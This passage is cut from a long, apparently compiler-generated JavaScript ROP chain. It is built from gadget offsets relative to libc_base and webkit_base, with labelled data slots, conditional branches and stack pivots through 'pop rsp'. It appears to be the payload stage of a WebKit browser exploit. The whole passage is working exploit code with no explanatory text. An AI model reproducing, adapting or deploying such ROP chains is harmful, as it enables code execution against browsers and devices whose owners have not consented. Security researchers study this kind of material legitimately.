rcx ]); //L4277: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4279: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+238112, //L4282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238096, //L4280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4280: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4282: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+238272, //L4287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+238288, //L4288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238224, //L4284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4284: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4285: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4286: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4287: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4288: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+238400, //L4289+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+238392, //L4289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4289: db([0, 0]); // 0x0 set_gadgets([ ropchain+238416, //L4289+24 ropchain+239672, //L4283 libc_base+764760, //pop rsi ropchain+238456, //L4290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4290: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4292: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+238576, //L4295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238560, //L4293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4293: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4295: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+238752, //L4298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+238768, //L4299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238720, //L4296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238736, //L4297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4296: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4297: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4298: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4299: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+238928, //L4303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238896, //L4301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+238912, //L4302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4300: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4301: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4302: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4303: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+239032, //L4305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239016, //L4304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4305: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+239128, //L4307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4306: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4307: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4308: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+239232, //L4309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239248, //L4310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4309: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4310: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+239416, //L4312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239432, //L4313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+239400, //L4311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4311: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4312: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4313: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+239576, //L4316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239592, //L4317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239544, //L4314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4314: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4315: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4316: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4317: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+239664, //L4318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4318: db([0, 0]); // 0x0 //L4283: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+239792, //L4321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239808, //L4322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+239776, //L4320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4320: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4321: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4322: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+239920, //L4324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239968, //L4327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239936, //L4325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4324: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4325: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4326: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4327: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+240080, //L4328+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+240072, //L4328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4328: db([0, 0]); // 0x0 set_gadgets([ ropchain+240096, //L4328+24 ropchain+240664, //L4323 libc_base+764760, //pop rsi ropchain+240136, //L4329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4329: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4331: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240256, //L4334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240240, //L4332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4332: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4334: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+240400, //L4337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240368, //L4335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+240384, //L4336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4335: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4337: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+240488, //L4339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4338: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L4339: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240544, //L4340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4340: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4342: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+240624, //L4344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4344: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4323: //L4255: libc_base+764760, //pop rsi ropchain+240704, //L4345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4345: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4347: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240824, //L4350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240808, //L4348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4348: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4350: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+241000, //L4353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241016, //L4354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240968, //L4351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+240984, //L4352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4351: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4352: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4353: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4354: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+241176, //L4358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+241144, //L4356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241160, //L4357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4355: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4356: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4357: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4358: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+241280, //L4360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241264, //L4359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4359: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4360: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+241376, //L4362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4361: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4362: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4363: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+241480, //L4364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241496, //L4365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4364: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4365: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+241664, //L4367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241680, //L4368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+241648, //L4366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4366: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4367: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4368: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+241840, //L4373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241856, //L4374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241792, //L4370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4370: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4371: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4372: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4373: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4374: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+241968, //L4375+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+241960, //L4375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4375: db([0, 0]); // 0x0 set_gadgets([ ropchain+241984, //L4375+24 ropchain+243336, //L4369 libc_base+764760, //pop rsi ropchain+242024, //L4376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4376: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4378: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+242144, //L4381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+242128, //L4379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4379: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4381: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+242320, //L4384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+242336, //L4385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+242288, //L4382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+242304, //L4383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4382: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4383: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4384: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4385: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+242432, //L4387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+242416, //L4386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4387: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4388: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4389: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L4390: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+242632, //L4392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4392: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+242688, //L4393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4393: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+242824, //L4397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+242808, //L4396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4395: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4397: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+242944, //L4400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+242912, //L4398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4398: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4400: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+243080, //L4402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243096, //L4403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243064, //L4401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4401: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4403: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+243240, //L4406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243256, //L4407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+243208, //L4404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4404: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4405: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4406: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4407: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+243328, //L4408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4408: db([0, 0]); // 0x0 //L4369: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+243456, //L4411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243472, //L4412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243440, //L4410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4410: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4411: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4412: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+243632, //L4417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243648, //L4418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+243584, //L4414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4414: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4415: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4416: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4417: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4418: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+243760, //L4419+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+243752, //L4419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4419: db([0, 0]); // 0x0 set_gadgets([ ropchain+243776, //L4419+24 ropchain+244728, //L4413 libc_base+764760, //pop rsi ropchain+243816, //L4420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4420: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4422: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+243936, //L4425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243920, //L4423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4423: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4425: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+244080, //L4428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244048, //L4426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244064, //L4427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4426: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4427: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4428: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244176, //L4430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4429: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4430: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4431: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, 